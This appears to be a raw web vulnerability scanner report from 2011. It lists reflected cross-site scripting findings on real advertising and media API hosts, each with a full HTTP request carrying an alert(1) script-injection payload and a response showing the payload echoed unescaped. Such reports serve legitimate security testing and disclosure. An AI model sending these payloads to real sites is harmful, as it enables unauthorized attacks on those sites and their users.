HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:42 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/3/882857095/ |
GET /ee14a"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/3/882857095/ |
GET /8de4c"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:26 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:26 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/8de4c"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/1/52531776/ |
GET /c8c8a"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:50 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13466 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/1/52531776/ |
GET /23776"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13396 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/23776"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/3/1777313403/ |
GET /5ae45"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:07 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:07 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/3/1777313403/ |
GET /e2e0c"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:12 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/e2e0c"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/1/585997419/ |
GET /c9666"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:44 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:44 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/1/585997419/ |
GET /4ab87"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:47 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/4ab87"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/3/144927758/ |
GET /5bd70"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:17 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:17 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/5bd70"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/3/144927758/ |
GET /22ce9"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:11 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:11 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/d_layer.php |
GET /adscgen/d_layer.php?sub Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:38:46 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b103.dl Content-Type: text/html Content-Length: 12165 var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]... eyClickthru = 1; } DL_Close(false); window.top.location.href= } function DL_Close(adscout) { if (typeof adscout == 'undefined' || adscout == true) { DL_Adscout(adsc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/d_layer.php |
GET /adscgen/d_layer.php?sub Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:39:00 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b202.dl Content-Type: text/html Content-Length: 12193 var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]... t); } // Set a flag so animation loop will stop running DL_ScrollState = 2; DL_Scroll(); } function DL_Adscout(adscout) { (new Image).src="//amch } function DL_Add(){ DL_InsertSwf(); } function DL_FlashInstalled() { // Detect swf plugin. var result = false; if (navigator.m ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/d_layer.php |
GET /adscgen/d_layer.php?sub Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:39:00 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b101.dl Content-Type: text/html Content-Length: 12193 var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]... DL_SurveyClickthru = 1; } DL_Close(false); window.top.location.href= } function DL_Close(adscout) { if (typeof adscout == 'undefined' || adscout == true) { DL ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/dynamiclink.js |
GET /adscgen/dynamiclink.js Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:39:07 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b101.dl Set-Cookie: LP=1316277547; expires=Wed, 21 Sep 2011 20:39:07 GMT; path=/; domain=.questionmarket Content-Length: 2445 Content-Type: text/html (function(){ var d=document,w=window,dle; function ff(){ var p=w.parent,r; while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { } p = p.paren ...[SNIP]... } df=biggestframe; } d=df.document; if (!df.DL_already_ran){ dle=d.createElement( dle.src='http://amch try { if (dle.src.search('d_layer' dle.src=dle.src.replace( } } catch (e) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/dynamiclink.js |
GET /adscgen/dynamiclink.js Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:40:24 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b201.dl Set-Cookie: LP=1316277624; expires=Wed, 21 Sep 2011 20:40:24 GMT; path=/; domain=.questionmarket Content-Length: 2448 Content-Type: text/html (function(){ var d=document,w=window,dle; function ff(){ var p=w.parent,r; while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { } p = p.paren ...[SNIP]... d=df.document; if (!df.DL_already_ran){ dle=d.createElement( dle.src='http://amch try { if (dle.src.search('d_layer' dle.src=dle.src.replace( } } catch (e) {} dle.type="text/jav ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/dynamiclink.js |
GET /adscgen/dynamiclink.js Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:39:34 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b102.dl Set-Cookie: LP=1316277574; expires=Wed, 21 Sep 2011 20:39:34 GMT; path=/; domain=.questionmarket Content-Length: 2447 Content-Type: text/html (function(){ var d=document,w=window,dle; function ff(){ var p=w.parent,r; while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { } p = p.paren ...[SNIP]... } d=df.document; if (!df.DL_already_ran){ dle=d.createElement( dle.src='http://amch try { if (dle.src.search('d_layer' dle.src=dle.src.replace( } } catch (e) {} dle.type="text/javas ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.uproxx.com |
Path: | /ulink/feed |
GET /ulink/feed?pid=1639e64b<img%20src%3da Host: api.uproxx.com Proxy-Connection: keep-alive Referer: http://www.ugo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:14:57 GMT Server: Apache Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5055 UPROXXJSON( [{"category":"TV \/ Movie News","content_title": ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 483 Content-Length: 483 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:38 GMT Date: Sat, 17 Sep 2011 16:23:38 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2&aid=f3j180cc"-alert(1)- var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type='t ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 459 Content-Length: 459 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:36 GMT Date: Sat, 17 Sep 2011 16:23:36 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptge2c76"-alert(1)- var action; validRequest = false; if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 486 Content-Length: 486 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:40 GMT Date: Sat, 17 Sep 2011 16:23:40 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2&aid=f3j&zip var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 483 Content-Length: 483 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:39 GMT Date: Sat, 17 Sep 2011 16:23:39 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2&aid=f3j&zip var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 483 Content-Length: 483 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:37 GMT Date: Sat, 17 Sep 2011 16:23:37 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2ad912"-alert(1)- var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
